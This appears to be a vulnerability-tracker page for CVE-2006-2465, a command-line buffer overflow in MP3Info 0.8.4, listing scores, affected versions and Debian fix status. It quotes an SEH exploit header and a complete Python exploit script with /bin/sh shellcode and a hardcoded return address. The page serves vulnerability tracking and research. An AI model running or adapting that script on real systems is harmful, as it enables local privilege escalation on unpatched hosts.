CVE-2006-2465
Published 2006-05-19
Priority P427 · medium · 5.1 · CVSS 2.0
AV:N/AC:H/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 5.39% (91.7th percentile)
Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via a long command line argument. NOTE: if mp3info is not installed setuid or setgid in any reasonable context, then this issue might not be a vulnerability.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | mp3info | < mp3info 0.8.4-9.1 (bookworm) | mp3info 0.8.4-9.1 (bookworm) |
| mp3info | mp3info | — | — |
| mp3info | mp3info | >= 0 < 0.8.4-9.1 | 0.8.4-9.1 |
| mp3info | mp3info | >= 0 < 0.8.4-9.1 | 0.8.4-9.1 |
| mp3info | mp3info | >= 0 < 0.8.4-9.1 | 0.8.4-9.1 |
| mp3info | mp3info | >= 0 < 0.8.4-9.1 | 0.8.4-9.1 |
CVSS provenance
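| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 5.1 | MEDIUM | AV:N/AC:H/Au:N/C:P/I:P/A:P |
| osv | — | 5.1 | MEDIUM | — |
| vendor_debian | — | 5.1 | LOW | — |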
GHSA
GHSA-cm74-95vp-cwf5: Buffer overflow in MP3Info 0
ghsa_unreviewed·2022-05-01
OSV
CVE-2006-2465: Buffer overflow in MP3Info 0
osv·2006-05-19·CVSS 5.1
Debian
CVE-2006-2465: mp3info - Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via ...
vendor_debian·2006·CVSS 5.1
Scope: local
bookworm: resolved (fixed in 0.8.4-9.1)
bullseye: resolved (fixed in 0.8.4-9.1)
forky: resolved (fixed in 0.8.4-9.1)
sid: resolved (fixed in 0.8.4-9.1)
trixie: resolved (fixed in 0.8.4-9.1)
No detection rules found.
Exploit-DB
MP3Info 0.8.5a - Local Buffer Overflow (SEH)
exploitdb·2014-03-19
---
```
# Exploit Title: mp3info SEH exploit
# Date: 18 March 2014
# Exploit Author: Ayman Sagy
# Vendor Homepage: http://ibiblio.org/mp3info/
# Software Link: https://www.exploit-db.com/apps/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
# Version: MP3Info 0.8.5
# Tested on: Windows 7 Ultimate 64 and 32 bit
# CVE : 2006-2465
# Original POC: http://www.exploit-db.com/exploits/31220/
#
# The process memory region starts with a null byte but exploitation is still possible because of
# the little endian architecture provided that the return address gets placed at the end of the buffer,
# this however confines us in the tiny 4-byte area after pop/pop/retn
# Using a couple of trampolines I jumped back to the beginning of the buffer which is 533 by
```
Exploit-DB
MP3Info 0.8.5a - Buffer Overflow
exploitdb·2014-01-27
---
```python
# Waste of CPU clock N2
# Exploit for: mp3info! Latest version
# Author: jsacco - [email protected]
# Vendor: http://ibiblio.org/mp3info/
# No-one-cares-about programs!
# Python 2 syntax (print statement, os.errno)
import os
import subprocess

junk = "\x90\x90\x90\x90"*8
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
buffer = "\x90\x90\x90\x90"*89
eip = "\x10\xf0\xff\xbf"
print "# MP3info is prone to a Stack-BoF"
print "# Wasting CPU clocks on unusable exploits"
print "# This is exploit is for educational purposes"
try:
    subprocess.call(["mp3info", junk+shellcode+buffer+eip])
except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "MP3Info not found!"
    else:
        print "Error executing exploit"
    raise
```
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/30945
http://packetstormsecurity.com/files/124955/Mp3info-Stack-Buffer-Overflow.html
http://packetstormsecurity.com/files/125786/MP3Info-0.8.5-SEH-Buffer-Overflow.html
http://securitytracker.com/id?1016108
http://www.exploit-db.com/exploits/32358
http://www.securiteam.com/exploits/5GP0E15IKO.html
http://www.securityfocus.com/bid/18016